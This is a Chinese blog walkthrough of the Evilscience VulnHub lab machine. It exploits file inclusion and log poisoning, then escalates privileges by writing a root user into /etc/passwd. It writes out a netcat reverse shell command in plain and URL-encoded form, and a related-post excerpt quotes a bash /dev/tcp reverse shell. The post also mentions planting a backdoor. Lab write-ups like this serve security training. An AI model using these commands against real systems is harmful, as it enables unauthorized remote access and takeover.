Evilscience 渗透测试

最新推荐文章于 2024-03-19 11:30:00 发布
最新推荐文章于 2024-03-19 11:30:00 发布
阅读量659 收藏
点赞数
分类专栏: 靶机 渗透测试 Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_39086634/article/details/105515545
版权
渗透测试 同时被 3 个专栏收录
47 篇文章 3 订阅
订阅专栏
靶机
24 篇文章 1 订阅
订阅专栏
Linux
14 篇文章 1 订阅
订阅专栏

Evilscience渗透测试

0x00实验环境

靶机:Evilscience,IP地址:192.168.8.147

测试机:Kali,IP地址:192.168.8.145;

0x01实验流程

信息收集——主机发现、端口扫描

渗透测试

0x02实验步骤

  1. 主机发现

  1. 端口及服务扫描

  1. 探测web端

在url中发现疑似文件包含

 

扫描web目录

  1. 尝试文件包含,BP抓包

爆破文件包含目录

发现的确存在文件包含

可以看到/var/log/auth.log保存的是ssh的登录记录

尝试ssh反弹shell被auth.log记录保存

查看记录是否被写入

尝试加入命令执行

  1. 设置反弹shell

mknod backpipe p && nc 192.168.8.145 4444 0<backpipe | /bin/bash 1>backpip

mknod+backpipe+p+%26%26+nc+192.168.8.145+4444+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe

PS:

>获取反弹shell

mknod backpipe p && nc 测试机IP 监听端口 0<backpipe | /bin/bash 1>backpipe

 

url编码——>

 

mknod+backpipe+p+%26%26+nc+测试机IP+监听端口+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe

由于环境原因,所以重新安装靶机,ip改变192.168.8.148

成功getshell

  1. 提权

发现是ubuntu16.04的系统版本

查看该用户的root权限命令

尝试运行该脚本

可以发现它是以root权限运行的

尝试向/etc/passwd中加入一个用户

设置一个密码并加盐值

perl -le 'print crypt("fuck","addedsalt")'

ady6w7OPdeVHI

   

    添加用户

 

尝试切换用户

提权成功

  1. 清理痕迹,留后门

 

 

总结:

  1. 首先发现有文件包含,但是普通的文件包含无法显示数据,用文件包含的字典爆破出有效文件目录
  2. 发现是ssh的连接日志,故意以ssh一句话@ip连接该目标主机,让其被日志文件记录
  3. 尝试文件包含并添加命令,发现可以执行,继而添加反弹shell脚本或者直接用msfvenom生成反弹shell并用包含命令下载赋权执行,kali监听,都可以getshell
  4. Get shell以后首先素质三连,切换交互式终端,查看当前用户可以使用的root权限命令,然后根据系统版本漏洞或者命令权限漏洞提权如向/etc/passwd写入一个root权限用户以提权
  5. 加盐值的命令如下

perl -le 'print crypt("密码","addedsalt")'

 

Darklord.W
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机渗透(十二)evilscience
qq_42180996的博客
05-23 1563
靶机evilscience 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(80端口) 2.目录扫描(dirb) 3.文件包含漏洞利用 >另一种执行ls命令的方法 4...
漏洞payload 靶机_kali渗透综合靶机(十六)--evilscience靶机
weixin_34239718的博客
12-23 460
kali渗透综合靶机(十六)--evilscience靶机一、主机发现1.netdiscover -i eth0 -r 192.168.10.0/24二、端口扫描1. masscan --rate=10000 -p0-65535 192.168.10.195三、端口服务识别1. nmap -sV -T4 -O -p 22,80 192.168.10.195四、漏洞查找与利用1.目录扫描2. 发现h...
evilscience 靶机渗透
weixin_44769042的博客
10-30 266
目录 主机发现 端口扫描 服务版本,操作系统扫描 开始渗透 反弹shell 提权 提权成功,得到flag 总结 主机发现 这两个ip mac地址是一样的,随便用一个就行 端口扫描 服务版本,操作系统扫描 开始渗透 1> web端目录扫描 这个页面有个下载,但是没啥用 扫了一堆都没啥用 2> 主页找到一个类似文件包含的特征点 尝试包含一下/etc/passwd,,结果没啥用 3> 用字典跑一下包含目录 找到几个...
kali渗透综合靶机(十六)--evilscience靶机
WY92139010的博客
06-13 375
kali渗透综合靶机(十六)--evilscience靶机 一、主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24    二、端口扫描 1. masscan --rate=10000 -p0-65535 192.168.10.195    三、端口服务识别 1. nmap -sV -T4 -O -p 22,80 192.168.1...
靶机实战-evilscience
滕财然的博客
01-28 635
evilscience靶机实战 文章目录evilscience靶机实战1、主机发现2、端口扫描3、端口详情扫描4、访问80端口5、提权方法一方法二 1、主机发现 目标IP:192.168.232.164 2、端口扫描 3、端口详情扫描 22端口–ssh、80端口–http 4、访问80端口 浏览网站,寻找有价值的信息 发现该网站有可能存在LFI(本地文件包含) 在about.php页面看...
现隐藏的内容.docx
09-06
在网络安全和渗透测试中,发现隐藏内容是至关重要的一步,因为这可以帮助揭示潜在的安全漏洞和未公开的信息。本文将详细探讨几种技术,用于检测应用程序如何处理不存在的资源、获取常见文件和目录信息、审查客户端...
Evilscience靶机渗透实战-vulnhub系列(五)
PANDA墨森的博客
07-04 541
这是vulnhub靶机系列文章的第五篇,本次的靶机主要学习到的漏洞利用为文件包含漏洞,话不多说,直接开始吧... 靶机下载地址:https://www.vulnhub.com/entry/the-ether-evilscience,212 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13195877.html #001 环境搭建(nat) 攻击机kali:192168.136.129 靶机evilscience:192.168.136.143 ..
靶机记录(十二):evilscience
weixin_47306547的博客
10-30 209
目录 主机发现 端口扫描 SSH尝试连接 Web渗透 漏洞挖掘 GetShell 法一 法二(MSF) 提权 法一(失败了) 法二(脏牛,也失败了。。)​​​ 法三 法四 法五 flag 清痕迹,留后门 主机发现 端口扫描 SSH尝试连接 Web渗透 漏洞挖掘 试试其他的路径 : /var/log/apache2/access.log /var/log/apache/access.log -----WE...
Vulnhub 渗透练习(八)—— THE ETHER: EVILSCIENCE
shinygod的博客
02-19 598
本地文件包含:利用 ssh 登录产生错误日志写入一句话木马(ssh ''@ip)seclists 字典:https://github.com/danielmiessler/SecListssudo -l。
The Ether: EvilScience靶机渗透实战总结
weixin_34220834的博客
08-20 1099
近期朋友给我发了一个靶机,说是他在日志注入的时候遇到了一点小问题,让我帮忙解决一下。下载下来之后,感觉这个靶机还是挺不错的,里边有一些套路,于是整理成一篇文章,感兴趣的小伙伴可以自己尝试一下。 靶机下载https://www.vulnhub.com/entry... 信息收集首先扫描内网,发现目标主机ip arp-scan -l ...
渗透笔记-Evil-Droid学习
qq_21522815的博客
07-09 2531
行行行
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE
LYJ20010728的博客
08-07 1061
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE环境下载THE ETHER: EVILSCIENCE靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 THE ETHER: EVILSCIENCE靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 攻击机IP地址:192.168.246.129 渗透测试 信息搜集 用netdiscover查看一下:sudo netdiscover -r 192.168.246.0
【burpsuite安全练兵场-服务端9】服务端请求伪造SSRF漏洞-7个实验(全)
最新发布
wangluoanquan111的博客
03-19 931
blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。!blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。!
dajiangtai: ssh: connect to host dajiangtai port 22: No route to host 解决办法
sinat_36222227的博客
03-25 327
hadoop安装在虚拟机中,电脑重装win7系统之后Linux虚拟机的静态ip变了,懒得改ip了,执行命令start-dfs.sh 直接启动hdfs时报如下错误dajiangtai: ssh: connect to host dajiangtai port 22: No route to host,jps查看进程发现DN和NN没有启动起来。 解决办法:查看ip ,ifconfig ,修改/et...
获得shell的几种姿势
weixin_30566149的博客
07-13 406
windows提权 1.通过sqlmap连接mysql获取shell (1)直接连接数据库 sqlmap.py -d “mysql://root:123456@127.0.0.1:3306/mysql”–os-shell (2)通过选择32位或者64位操作系统,获取webshell,执行 bash -i >& /dev/tcp/192.168.1.3/80800>&...
靶机渗透(一)Lazysysadmin
qq_42180996的博客
04-26 3811
靶机Lazysysadmin 一、实验环境 二、实验步骤 (一)信息收集 1.查询测试机IP地址,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/namp) (二)漏洞扫描 1.开启nessusd服务,加载插件,登录 2.建立扫描 3.扫描结果 (三)ssh爆破(22端口) 1.启动msf终端 2.搜索ssh_login的相关工具...
靶机渗透------DC-3
Z_Grant的博客
09-19 5593
文章目录一,工具学习二,测试流程(1)信息收集 一,工具学习 二,测试流程 (1)信息收集
逻辑漏洞总结
热门推荐
Darklord.W
04-10 1万+
总结逻辑漏洞名称及用法: 1、什么是逻辑漏洞 之所以称为逻辑漏洞,是因为代码之后是人的逻辑,人更容易犯错,是编写完程序后随着人的思维逻辑产生的不足。sql注入、xss等漏洞可以通过安全框架等避免,这种攻击流量非法,对原始程序进行了破坏,防火墙可以检测,而逻辑漏洞是通过合法合理的方式达到破坏,比如密码找回由于程序设计不足,会产生很多问题,破坏方式并非向程预防思路 1.cookie中设定多个验证...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值